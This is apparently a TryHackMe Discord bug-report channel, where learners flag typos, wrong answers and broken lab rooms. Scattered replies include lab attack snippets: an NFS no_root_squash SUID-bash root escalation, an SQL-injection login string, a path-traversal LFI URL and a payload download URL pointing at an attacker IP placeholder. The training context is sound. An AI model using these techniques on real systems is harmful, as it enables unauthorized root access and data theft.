#room-bugs
where can I report it more formally so it gets noticed?
Lo, just done the Intro to X86 Assembly room
And I noticed something odd going on here
Room's assembly simulator, the Lea instructions task
I can't exactly seem to post any screenshots for some reason
but somebody's converted endianness wrong in step 7 of the instructions,
mov [ebx+ecx], eax
where
EAX = 0x00000050
and the memory location is 0x4B
for some reason, the value in 0x4B after that instruction is 0x50000000
so it's no longer in Little Endian
that ain't right, right?
https://tryhackme.com/room/x86assemblycrashcourse
Task 8 Practice Time, Question:
Run the test and the cmp instructions. Which flags are triggered after the 11th instruction?
(Note: Use these abbreviations in alphabetical order with no spaces: CF,PF,SF,ZF)
The answer should be PF,ZF as that's what the Assembly Emulator shows. What's marked as correct is CF,SF which is the register status after the 10th instruction, not the 11th.
Did someone change before to after in the question? ;D
here's what I'm getting (screenshot) and here's the link:
https://nvd.nist.gov/vuln/search/results?form_type=Advanced&results_type=overview&search_type=all&isCpeNameSearch=false&pub_start_date=07%2F01%2F2021&pub_end_date=07%2F31%2F2021
Hi all,
How can i clone a room like https://tryhackme.com/room/introdigitalforensics
I already read the manual but there is no button for cloning a THM room. I can only clone rooms that I have created
You can't clone a room you didn't create.
In this guide https://help.tryhackme.com/en/articles/6498333-cloning-a-room it says that you can.
Anyway thanks for your response
I think that refers to business or education users
@stiff tundra can maybe confirm?
I hold an educational licence
Are you an admin?
The university just gave me the licence (paid for it - no idea)
It says that "the duration of your subscription belongs to and is regulated by...."
Is anyone else having issues with "Active Directory Basics" regarding the Active Machine Information? Every time I go to the IP address given, through my own VM connected through THM, I get "The connection has timed out". I've tried restarting a new machine, restarting my VM, getting a new OpenVPN configuration file, and still no luck. Any assistance is appreciated.
I had the same thing happen to me last night on the machine... I restarted things and it worked for me... didn't know what else to do
Active Directory Basics, Task 6, Typo (under the impression I post something like this here): "While explaining every single ___ of them...."
Came across typos in the past, so just letting whoever know. Not really a bug, but just trying to help keep things looking good! ❤️
yeah just fine to report typos here
I did in the past, but I think I actually did it through the chat on the website, I can't remember 😄 thanks @rugged canyon !
Gave +1 Rep to @rugged canyon
both should work
hey hey folks. I believe I've identified a box that is not responding correctly with THM provided steps.
The room is https://tryhackme.com/room/exploitingad . It is not acting appropriately when following the written instructions. I was able to get the TGT for svcIIS and then able to get the TGS for HTTP/WSMAN for t1_trevor.jones, but it still won't let me enter a PSSession. I have tried other T1 admins as well and keep getting this same error. What is happening with this room that is preventing me from entering this PSSession?
```
PS C:\Users\t2_caroline.dawson\wtf> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession : Connecting to remote server thmserver1.za.tryhackme.loc failed with the following error message : A specified logon session does not exist. It may already
have been terminated. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (thmserver1.za.tryhackme.loc:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

PS C:\Users\t2_caroline.dawson\wtf> klist

Current LogonId is 0:0x124df1

Cached Tickets: (2)

#0>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: WSMAN/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/7/2023 17:13:45 (local)
        End Time:   12/8/2023 3:13:18 (local)
        Renew Time: 12/14/2023 17:13:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: HTTP/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/7/2023 17:13:39 (local)
        End Time:   12/8/2023 3:13:18 (local)
        Renew Time: 12/14/2023 17:13:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

PS C:\Users\t2_caroline.dawson\wtf> New-PSSession -ComputerName thmserver1.za.tryhackme.loc -Authentication kerberos

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  2 WinRM2          thmserver1.z... RemoteMachine   Opened        Microsoft.PowerShell     Available

PS C:\Users\t2_caroline.dawson\wtf> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents>
```
The instructions are not clear and DO NOT SPECIFY "-Authentication kerberos" in the command options to get this to complete
When I was doing the room, my notes state I used this command to initiate the remote PowerShell connection and not "Enter-PSSession":
winrs -r:thmserver1.za.tryhackme.loc cmd
You can also use the following command to see what tickets are loaded into memory:
klist
Here are the 3 commands, in order, that I did:
```
klist
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
winrs -r:thmserver1.za.tryhackme.loc cmd
```
Protocols and Servers 2
5.2: the book.txt size is 416, but the answer is 415
Thank you for the assistance! I will try your way to see if that also works for me. I was able to get the issue solved by adding -Authentication kerberos to my New-PSSession: New-PSSession -ComputerName THMSERVER1.za.tryhackme.loc -Authentication kerberos
Gave +1 Rep to @devout bolt
I believe there is a bug in Wreath Network. I'm at webserver exploitation [Task 6], where I have root access to the server and I'm supposed to copy the id_rsa, but the file is empty
I would like to bump this issue because I ran into this issue as well.
Also, in the Lea Instruction in the above exercise, the value of EAX is 0x00000050 at the time of instruction 7, mov [ebx+ecx], eax, but when it executes it loads 0x50000000 into memory. Shouldn't it be 0x00000050?
Hello! I have been going through https://tryhackme.com/room/cryptographyintro and I think I found an important mistake. After discussing symmetric ciphers, the text says:
Integrity: When Bob receives an encrypted message and decrypts it successfully using the key he agreed upon with Alice, Bob can be sure that no one could tamper with the message across the channel. When using secure modern encryption algorithms, any minor modification to the ciphertext would prevent successful decryption or would lead to gibberish as plaintext.
That's misleading at best, if not just wrong. Unless a cipher with authenticated encryption is used (e.g. AES with GCM block chaining mode), an encrypted message can be modified without the recipient knowing it. That's why Message Authentication Codes are used. For example, AES-CBC wouldn't guarantee integrity. Since a beginner developer could think that encrypting something using a standard algorithm would be enough, I believe it would be a good idea to clearly state that a symmetric cipher on its own may not guarantee integrity.
👋
Typo in AoC-2023's Day 9 text:
THEN text = combine with space(["net", "localgroup", "administrators"]) // text = "net localgroup administrators
I think it was meant to be (something like) - depending on how C# does array slices:
THEN text = combine with space(array[1:]) // text = "net localgroup administrators"
Helloooo, I'm in the Wazuh room on Task 10 about using the API. It gives some very specific commands where I've added the username/password given in task 2 in an attempt to authenticate so I can use the API. The authentication command given in the room and from Wazuh's help center are the same, but it does not work.... I'm guessing the username/password need to be a local Linux user account and not a Wazuh portal/GUI user?
https://tryhackme.com/room/wazuhct
note: I've also tried the initial token command without a username and password as displayed in the room instructions, but changed to the correct management IP
note2: This didn't prevent me from completing the room.
What does your token look like?
I had to fire the machine back up but this is the output for the token with and without the username/password combo provided:
Are you sure your token wasn't also Unauthorized when you last tried (with the correct user:pass)?
In the screenshot, when I first grabbed the token I didn't use the username/password provided... but I did again with the username/pass provided.... and it still gave me the same output. I think the issue is that the web portal user isn't a valid user to do API calls.... then again, I'm just guessing. I don't actually know why it's not accepting the user provided.
https://tryhackme.com/room/splunkexploringspl
Tasks 4.1 and 4.2 contain incorrect answers or the task is incorrectly prepared
In room subdomainenumeration Task 3
Google still gives 2 results. None of them starting with a B
If you do the following query it shows more results: site:tryhackme.com site:*.tryhackme.com
I'm having an issue with the Linux Privilege Escalation room on task 7. When looking for files/programs with the S bit set, this particular task is looking for nano with the S bit set. In my second screenshot you'll see nano is installed, but without the S bit set.
Each task has its own particular VM and this one is for SUID's.
command used:
find / -type f -perm -04000 -ls 2>/dev/null
https://tryhackme.com/room/linprivesc
nano was just an example in the task to demonstrate the concept. To answer the questions you have to find another one on the target machine that can be abused to achieve your goal 🙂
ooohhhhhhhhhhhhhhhhhh snap. Ty.
https://tryhackme.com/room/adventofcyber2023 Task 17 [Day 11]
The following sentence is duplicated:
You can continue the exploitation by asking for a TGT of the vulnerable user using the certificate generated in the previous command.
Also, F138C405BD9F3139994E220CE0212E7C should be DDD22F37A3037852AFGE70FAB93E0CC71
I think that is on purpose. After the first tasks, which were more like a walkthrough, the following tasks require more actual work to solve the questions.
It doesn't make sense. I expected these three hashes to match.
so you should also mark that the usernames don't match 😉
The username matches just fine. It's all Administrator in the example it gives the reader.
Hello again, hopefully this is a bug and not something I'm doing wrong again, but in the Linux Privilege Escalation room on Task 11 (NFS): I've mounted all 3 shares into different /tmp/mount folders and did a test to figure out which one I can write to.... and the only folder I can write to is the /tmp folder share. No problem, I've created my mini bash program and set the S bit, but when I run the program I get an error
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
Looks like a dependency is missing, lib6
I checked a walkthrough video and a guide on Medium and they're all using the same little program. Hopefully the screenshot isn't too confusing.
https://tryhackme.com/room/linprivesc
How did you compile the exploit?
gcc nfs.c -o nfs -w
Can you try to compile it again and add -static in the command and try running it again?
just to be clear the command is:
gcc nfs.c -o nfs -w -static
That totally worked - what does the -static flag do?
oh wait a sec, I'm not the root user.... I could run the script but do not have the privs
oh yes this problem
it is very common
the task text is an example and not the easiest way to get the correct answer
Usually, apps or programs have dependencies or requirements for them to run. Adding that flag makes it a static binary, thus running without dependencies.
i.e. do this:
```
# on target machine:
cp /bin/bash /path/to/nfs/share/folder
# on attack machine:
sudo chown root:root /path/to/mounted/nfs/share/bash
sudo chmod +sx /path/to/mounted/nfs/share/bash
# on target machine:
/path/to/nfs/share/folder/bash -p
id
```
tada, it now shows that you got an effective user id of root
That is the entire list of things you need to do to use the bash approach, and it will work on every target machine that has bash and NFS with no_root_squash
TADA you did it
When you compiled the binary, did you do so with sudo privileges?
Living off the land is often better than cross-compilation or trying to do static compiling, shadow finds
Will add it in my notes. 
i.e. what shadow is doing above is copying the target's bash binary... changing its permissions and setting the SUID bit.... then you can run it with -p to keep the effective user and group... and tada, you've got an effectively root shell
@devout bolt ⬆️ see the message shadow posted above that this is a reply to... this will work with basically any NFS share that has the no_root_squash setting set
This is great!! Thank you so much! Same results with a different method. I'm very grateful to see another way to get the same result... I hadn't even thought of copying bash to the shared folder... genius!
Gave +1 Rep to @rugged canyon
Oh and yes, it totally worked and has given me insight on another way to solve this type of problem
https://tryhackme.com/room/adventofcyber2023 Task 18 [Day 12]
The commands rm config.xml and cp config.xml.bak config.xml should have sudo prepended.
Hey, are you a robot? 🤖
Hello, I have found a typo in room https://tryhackme.com/room/nmap04 task 4 question 2
You'd be better off posting it; from this alone, nobody will be sure which word.
can't post a screenshot
Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-2015-1635)? => CVE2015-1635
not sure if this counts as a bug but in agent-sudo the answer form will accept your entry for the password even if it's not quite right... Tripped me up and a few others I saw asking about the same. if there's a way to tighten the answer tolerance on the password it would avoid confusion.
@covert field just refresh the page and it should fix this error
https://tryhackme.com/room/adventofcyber2023 Task 19 [Day 13]
There's a typo in "we can attempt to connect to the VM by navigating to on the AttackBox browser". For example, I think it should read "we can attempt to connect to the VM by navigating to it on the AttackBox browser".
Bro don’t worry about such little things
You need to verify your tryhackme account
thanks got it
Hi Hackers,
I am trying to solve the Lesson Learned? room. I tried everything by myself first, then I felt I was stuck in rabbit holes. So I checked the walkthroughs on the Internet about this room and then I tried SQLi there, but the web page is not responding as it is supposed to. Could anyone guide me on what the issue with this page is?
My payload:
Username: 1' UNION SELECT null-- -
Password: pass
The response back from the server is an invalid password.
I would appreciate your response.
You might need to change your username.
Hello! For the Advent of Cyber Day 11 challenge I am getting this error when trying to run the script:
```
PS C:\Users\hr\Desktop> . .\PowerView.ps1
. : File C:\Users\hr\Desktop\PowerView.ps1 cannot be loaded because running scripts is disabled on this system. For
more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .\PowerView.ps1
+   ~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess
```
I do not appear to have admin access to allow this. Am I doing something wrong?
sorry guys
apparently i cannot read
disregard 🙂
Hola Rickymoney99, you can find the PowerShell execution policy bypass on the Microsoft Learn website: "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4"
The Set-ExecutionPolicy cmdlet changes PowerShell execution policies for Windows computers. For more information, see about_Execution_Policies. Beginning in PowerShell 6.0 for non-Windows computers, the default execution policy is Unrestricted and can't be changed. The Set-ExecutionPolicy cmdlet is available, but PowerShell displays a console me...
Or if you are running a .ps1 file in PowerShell, first you need to bypass the PowerShell execution policy, and then you can run the .ps1 file with the escalated permissions.
tryhackme doesn't care about fixing typos?
They do.
https://tryhackme.com/room/adventofcyber2023 Task 20 [Day 14]
"X_train contains the training data, and X_validate our validation data. y_train contains the labels for our training data, and y_validate our labels for validation data."
should be
"train_X contains the training data, and validate_X our validation data. train_y contains the labels for our training data, and validate_y our labels for validation data."
Room: Tactical Detection (https://tryhackme.com/room/tacticaldetection)
Task 3 - Last Question:
Question:
What is the source, as shown in the output?
Problem:
- I think this has been updated since the room was created. See screenshot of the current source information.
- The "correct" answer as of now is WinEventLog:*
- This should be changed to WinEventLog:Security
AoC2023 Day 14, Putting it all together... or not. Not so serious, but there is an inconsistency between the text and the filenames in the folder: dataset_train.csv >> training_dataset.csv and dataset_test.csv >> testing_dataset.csv
I'm not sure if this is the right channel, but there is an issue within the Holo network. In Task 22 you're guided towards colabcat to crack a hash. https://github.com/someshkar/colabcat
The Problem with Colabcat is that it can get your Google account banned from any further Google Colab usage. It would be nice to add a warning, or change the task completely.
I agree with this. For any THM staff who see this, I would recommend providing a section on this tool. It's an open-source password cracker that utilizes AWS without breaking rules. We use it for actual pentests where I work.
https://github.com/Coalfire-Research/npk
Hi there, There is one typo in the Jupyter notebook for the Day-15 of the Advent Of Cyber'23. Don't know if it is intentional or not so can someone from staff or mod reach out to me then we can confirm it? It is very minor but something that can create trouble for beginners.
@quaint sparrow did you get the bug/typo?
Scrubz is a volunteer and not a member of THM Staff so he won't be able to make any changes to any rooms.
ok thx. what then is to do?
🫡
Should be fixed, thx. 👍
thank you 🙂
Gave +1 Rep to @raw bison
Great find... I've been working on this task for 3 days 
Should be fixed, thanks for reporting 🙂
Gave +1 Rep to @gloomy berry
.
Hello! I guess there is a small typo in today's AoC room
There's this command at more or less 70% of the task:
rwfilter FILENAME --fields=sIP,dIP --values=records,bytes,packets --count=10
But then in the CLI, rwstats is typed.
[day 17]
There is an output example:
```
            sIP|            dIP|                  sTime|
175.175.173.221|175.219.238.243|             [REDACTED]|
175.175.173.221|175.219.238.243|2023/12/08T04:28:45.678|
175.175.173.221|175.219.238.243|2023/12/08T04:28:45.833|
175.175.173.221|175.219.238.243|2023/12/08T04:28:46.743|
175.175.173.221|175.219.238.243|2023/12/08T04:28:46.898|
175.175.173.221|175.219.238.243|2023/12/08T04:28:47.753|
175.175.173.221|175.219.238.243|2023/12/08T04:28:47.903|
175.175.173.221|175.219.238.243|2023/12/08T04:28:48.764|
175.175.173.221|175.219.238.243|2023/12/08T04:28:48.967|
```
and it says:
Red flag! Over 10 DNS requests in less than a second are anomalous. We should highlight this communication pair in our report.
This is not correct: there are at most two requests per second. I guess this could be "over 10 requests per minute"... or the sample itself is wrong
```
2023/12/08T04:28:45.833
^    ^  ^  ^  ^  ^  ^
y    m  d  h  M  s
```
.
Hello
Currently the AoC Day 16 machine is not working.
If something can be done, thanks 😉
Something was done. Reboot the machine
👋 I'm sorry if this is the wrong place for this, but I'm catching up with Advent of Cyber and for some reason I can't submit the flag on Day 16. I click the button but nothing happens. I've been able to submit all the other answers without issue.
I've tried multiple browsers but no luck.
this problem is still present, can someone fix it?
inputting an answer from a walkthrough, I was able to get the correct answer...
#soc-level-2-path message ditto to the above
you can only access that on the target machine the task starts for you
So I cannot use my linux vm?
Did you try it again with a different browser?
It won't work with a different browser.
No, as the website points to localhost.
What does it mean?
Heya again - having a strange issue with the Lateral Movement room/network. DNS doesn't seem to be working over the VPN connection. I tried multiple times to restart the NetworkManager service, have only 1 DNS server and manually set /etc/resolv.conf but it seems my requests aren't going through. I booted up the attack box and it works just fine. I'll use the AB for now.
https://tryhackme.com/room/lateralmovementandpivoting
oof, I take it back, even the AttackBox is having trouble.... I did vote for a room reset, need 3 more:
I have the same issue, but it is with the exploitad room
Just reporting that the following two rooms have very much the same content and are both within the learning pathways for web fundamentals.
The former is the refreshed module. The content may essentially be the same, but the former has been aligned to the current burp suite version.
Volatility requires python version 2.6, please upgrade your python installation.
What year is it 😆
(not a bug, just for fun )
@glad badger @hazy tiger ⬆️
Done!
Heya All - weird issue with the Lateral Movement room task 6 - we're given T2 credentials with an internal site (like many of the other tasks). I've tried 4 sets of credentials and each time I get an Incorrect Password error when trying to connect via RDP. If anyone could lend a click to reset the room that would be great - hopefully it's not a true bug but someone just got in as a domain admin and changed passwords on us (lulz)
https://tryhackme.com/room/lateralmovementandpivoting
oh man, I hate to be the squeaky wheel, but now there's an even worse problem LOL. I let the room timer lapse so it would auto shutdown/reboot or w/e behavior is done after the room timer expires. After the machines were shut down (ping test) I started the room back up. Now THMDC is completely unreachable via ping and not responding to DNS requests. I can ping THMJMP2 via IP, but since THMDC isn't responding, pinging by its FQDN is also not functioning (as expected)
oh yay, things are back to working after a room reset- disregard! 😄
In https://tryhackme.com/room/linuxmodules
Task: du
the command that is the alternative to ls is `du -a --time -d 1 .`, i.e. adding the -a flag to `du --time -d 1 .` in the original text
.
@oblique panther Automoderator will mute you if you continue
Okey, silence me.
The burpsuiteold is the one which is in the learning path for the Complete Beginner Path. If it's been replaced with the newer version to match what's on the attack box, then I would replace it here too. I was actually just coming here to report that Task 11 - The Burp Suite Browser has the wrong information about the location of the setting to turn off the sandbox, and that may already be corrected in the other module.
.
-mute 24h 951764006924849212 keeps on posting “.” In channels, was warned
Mute <User:Mention/ID> <Duration:Duration> <Reason:Text>
Mute <User:Mention/ID> <Reason:Text> <Duration:Duration>
Mute <User:Mention/ID> <Duration:Duration>
Mute <User:Mention/ID> <Reason:Text>
Mute <User:Mention/ID>
Invalid arguments provided: No matching combo found
:mute: r00tt#0 has been muted.
Good evening
"I am reading a course on Windows APIs, and I have this question that is blocking me."
Which character appended to an API call represents an ANSI encoding?
Room URL: https://tryhackme.com/room/uploadvulns#
Summary: I've worked with #room-help already. According to those who assisted me, my enumeration should be working. I've opened a new VM and AttackBox 5 times now, including the most recent, which this documentation is built on. Is there any way to verify this room is still working? The general consensus from Discord is that I have done everything correctly
Additional Notes:
Discord conversation in #room-help begins at:
https://discordapp.com/channels/521382216299839518/522158539129618453/1189345468048736367
Below are the exact commands and output captures. I booted a whole new VM and AttackBox when starting this documentation.
sudo nano /etc/hosts
10.10.31.214 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm demo.uploadvulns.thm
ctrl x
y
‘enter’
cat /etc/hosts
```
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.31.214 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm demo.uploadvulns.thm
```
launch firefox, then refresh firefox
firefox - http://overwrite.uploadvulns.thm
webpage loads
gobuster dir -u http://overwrite.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The output is:
```
root@ip-10-10-211-54:~# gobuster dir -u http://overwrite.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://overwrite.uploadvulns.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/12/27 00:21:37 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2023/12/27 00:56:56 Finished
===============================================================
```
Good it does work
https://tryhackme.com/room/exploitingad has a bug in the Exploiting GPOs part. I have the user (I have also tested following a walkthrough, https://benheater.com/tryhackme-exploiting-active-directory/), but the user svcServMan, with or without a password, lets me log in through the runas command; it doesn't care if I leave it blank or put asdasdknqodqw in the password, it lets me spawn a CMD process. The problem is, when I follow the guide in the walkthrough and the instructions about adding GPM in mmc.exe, it says I don't have permission from the DC za.tryhackme.com. I have tested runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe and tested runas /netonly /user:THMSERVER2.za.tryhackme.loc\svcServMan cmd.exe and it is the same issue. I log in to the THMWRK1 server with the T2 admin t2_caroline.dawson from its RDP using the xfreerdp command, but I still have the issue. I have tested resetting the lab, also some days ago, and I'm experiencing the same issue
A note to add: when I try to go to http://distributor.za.tryhackme.loc/creds after running the next command on the AttackBox, systemd-resolve --interface exploitad --set-dns 10.200.120.101 --set-domain za.tryhackme.loc, it says to me for the URL distributor.za.tryhackme.loc/creds:
Hmm. We're having trouble finding that site.
We can't connect to the server at distributor.za.tryhackme.loc.
If you entered the right address, you can:
Try again later
Check your network connection
Check that Firefox has permission to access the web (you might be connected but behind a firewall)
Seems to be a DNS problem in the room, I guess, because I have followed the steps and sometimes it works and other times not
thanks
Gave +1 Rep to @rugged canyon
OWASP Top 10 has a dead link for WPScan on Task 13.
https://tryhackme.com/room/owasptop102021
hello #room-bugs
I guess there is a misunderstanding issue in the day 23 of the AoC Coerced Authentication room.
According to Microsoft
"A user accesses a client computer and provides a domain name, user name, and password" (the password provided is not sent to the server and is kept locally). "The client computes a cryptographic hash of the password and discards the actual password"
https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
Not as the room claims, as shown in the picture; it should only be sending a plaintext username, requesting a challenge to solve to prove their identity.
So the password sent in stage 1 should be removed and only a username sent.
You are referring to the Microsoft resource, but the application in day 23 isn't a MS one?
it is
#room-bugs on room metasploitexploitation task 6 question 3:
http://ATTACKING_MACHINE_IP:9000/shell.elf => http://ATTACKING_10.10.109.74:9000/shell.elf
What do you mean? The 'MACHINE IP' changes to the assigned IP after clicking on the green Start Machine button and letting it spin up after a few minutes.
That's correct, but the text "...ATTACKING_10.10.109.74" is confusing. The placeholder is wrong. It has to be ATTACKING_IP and not ATTACKING_MACHINE_IP
Yes, me too.
Yes, it should be done.
Oh.. got it.
I'm just doing the learning path and see some typos. Maybe it's important or not 🤷♂️
There were several instances I saw in the discord being corrected by THM Staff. Let's just wait for it as most are probably enjoying their holidays. Also, good job on doing the paths. Can't stick to following one myself. 😅
yes, that's true.
well, just start and do one by one 😉
Thanks to the AoC2023 side quest I am a noob at Wireshark. That's the next path I have to choose
Gave +1 Rep to @unborn pulsar
Bot got confused with the rep.
Salut quick reminder for OhSINT room,
As mentioned in this earlier message, the OhSINT room can't be done without writeups, as the WordPress site has not existed for some time. It is only accessible via the Wayback Machine, but in order to find it via the Wayback Machine you need the URL, and the URL can only be found via writeups.
What do you mean? If it's the Oliver Flint blog, I think it is part of the challenge for you || to search for the site and look it up using the Wayback Machine. ||
Hello, I was working on the room "Snapped Phish-ing Line" and I think the answer to the question "when was the phishing domain that was used to host the phishing kit archive first registered?" has changed, causing right answers to be returned as wrong
Actually, under normal conditions the site was reachable by just searching (without the Wayback Machine) the username of Oliver Flint on Google's first page (as I saw from writeups, they just search Google and go to the WordPress site and so on)
Im doing the buffer overflow prep room and I'm on task 10 (Overflow9) and it appears that the correct answer for the second question isn't being accepted. I re-did everything 3 times, then I watched a walkthrough video and the person has the exact same results as me but the answer isnt being accepted? I was able to answer the first question correctly which is needed to answer the second one.
I believe the answer should be: \x00\x04\x3e\xe1\ but it's not accepting it. https://tryhackme.com/room/bufferoverflowprep
Answer task 11, no problem....so strange D:
Man those trailing backslashes will kill you.
wdym? D:
Look at the answer you pasted - there's a trailing backslash
That's how all the others were answered.... just tried to answer it without the trailing backslash and it still doesn't like the answer 😦
oh I take it back, the other ones don't have that backslash (could have sworn they did) but it still doesn't work.... unfortunately
Just looked at my Task 11 - yep the answer is incorrect.
task 10 tho?
Sorry, Task 10, there are XX badchars
haha all good - oh damn....uhm, let me revisit ^__^ ty
I only see 4.... gosh, I don't know what I'm doing wrong 😦
Nope, not broken... the first task mentions that sometimes when 1 byte is a bad byte the byte next to it can also be a bad byte... in this instance both \x3e and \x3f are bad bytes... hence you are missing one
Aurora EDR Room Bugs (https://tryhackme.com/room/auroraedr):
1. In order to get the system to generate logs properly, you have to manually set the timeframe to June of 2022, otherwise you just get a message that the license has expired.
2. Task 7, question 1 asks this question:
```What is the title of the first event rule?```
It expects this answer (which is incorrect):
```WMI Process Reconnaissance```
The actual correct answer is this:
```Process Reconnaissance Via Wmic.EXE```
This comes directly from the .yml triggering the rule: https://github.com/SigmaHQ/sigma/blob/0.22-2839-gc0332a9d9/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml
3. Task 7, question 4:
```What is the Rule Title of the second Event?```
There is no second event triggered. The only way to properly trigger the 2nd event is if you delete the "password.txt" from the first time you run the batch file (which will fail to create events since the license is expired). I figured this out by reading the help archive and reverse engineering the answers, as I am able to clone rooms with my business account.
Overall, I strongly suggest Task 7 be re-written to include this information:
- Manually setting the time on the PC so it is within the license BEFORE running the batch file.
- Fixing the answer to Task 7 question 1.
In the cloned room below, I fixed both of these issues as a reference point for THM Staff to review:
https://tryhackme.com/jr/auroraedrCk
whoops nevermind
oh dang, I missed that little detail.....thanks :). Is there a way to identify the bad byte easily even though the debugger program didn't specifically tell me? Or is it just guessing?
Well, trying and failing to exploit it, and rerunning the bad byte check once you have removed the previous bad bytes, tends to tell you
gotcha - that makes sense
Yes
On the room https://tryhackme.com/room/osimodelzi at Task 4 Layer 5 - Session, maybe the highlighted "Whilst" is meant to be "While"
If I'm not mistaken, this is accepted in British English so it is technically correct.
Okay..
Whilst is being used as a conjunction, which is perfectly valid in British English (which is what I wrote the room in) 🙂
Hi.. I am learning XSS and at the https://tryhackme.com/room/xss room in Task 4 Stored XSS I accidentally input ||databaser|| and it ran as a correct answer.
Answer tolerance; if your answer is 95% correct it will be accepted
Yes, like one tolerance.
Not a big deal, but there is a small grammatical error in task 3 of the "Intro to C2" room. Where it says this: [..] and signatures can be easily be developed.
How ?
There are two "be"s
Link the room, please?
Room: "Unattended" running like a dog. Registry Explorer not opening at all, please check
Hello!
Flag8 and 9 are not working in the room:
https://tryhackme.com/room/windowslocalpersistence
I managed to get the flag, I already consulted a writeup, but I still can't add the flag.
Have you done the room in one go?
I've already tried twice.
I read that this room has to be completed from task 1 all throughout the end in one go, otherwise you won't be able to complete it.
The problem is not execution. I'm getting the flag, but even though the binary shows the flag and I copy the THM correctly, it doesn't accept it.
Ooh.. that's a different issue then from the one I read.
Room: Ice -- Task 3
Problem -- The cvedetails website has changed its format. It no longer gives you the grid that can be seen in writeups.. I was trying to avoid using one to get the answer, because I thought it would be clear. Since the answer on Q1 is very specific to that website, it's difficult to answer that question. The direct link to the CVE also no longer lists the Vulnerability Type (https://www.cvedetails.com/cve/CVE-2004-1561/). I am putting in the answer from the walkthrough to get through it, but think the question should be changed and not use that older type naming. Tried finding Darkstar on the Discord list to PM, but see that they might not be active. (reposting as requested)
CVE-2004-1561 : Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Room: Ice -- Task 3
Problem -- It makes reference to a room as a potential prereq that is showing as private, and I can't search for it. I think that means it's been retired? I have a sub so I don't think it's that.. Adjust if needed.. Link is to -- https://tryhackme.com/room/rpmetasploit
That RP: Metasploit reference is also made in Task 4 (Escalate) - in the questions, saying that the commands are taken from that room.
Hello @placid aspen, thanks for bringing it up, I have raised it to be looked into 🙂
Gave +1 Rep to @placid aspen (current: #457 - 9)
https://tryhackme.com/room/powershell Task 3 question 1 asks for the location of "interesting-file.txt", but the actual file is called "interesting-file.txt.txt". I was wondering why I couldn't find it...
Also, the backup file in Task 4 has a double extension: ".bak.txt". It looks like it wasn't intentional and makes it more difficult to find the file.
Is the USTOUN room fixed? The database port still doesn't spawn for me
https://tryhackme.com/room/nahamstore
http://nahamstore.thm/product/picture/?file=....//....//....//....//....//....//lfi/flag.txt
According to writeups, the intended way is causing me errors
Typo In Task 2 of https://tryhackme.com/room/windowsapi
- Core DLLs: A group of four DLLs that define call structures. (KERNEL32, USER32, and ADVAPI32). These DLLs define kernel and user services that are not contained in a single subsystem.
...what's the fourth?
This room has been retired a couple of weeks ago.
the room introtodockerk8pd has incomplete sections and a missing box
Which task?
Running your first Container
Everything is there for me?
it says update and change for me
Can you take a screenshot after verifying your account?
should i send the screenshot here?
Yeah.
Can I have the link to the room please? Lol
the newest room links to it
Ah, thanks for pointing out.
cc @dusky junco
The new room points to https://tryhackme.com/room/introtodockerk8pd instead of https://tryhackme.com/room/introtodockerk8pdqk
i thought i had that room completed lol
`Container Vulnerabilities`?
yes
huh that's interesting
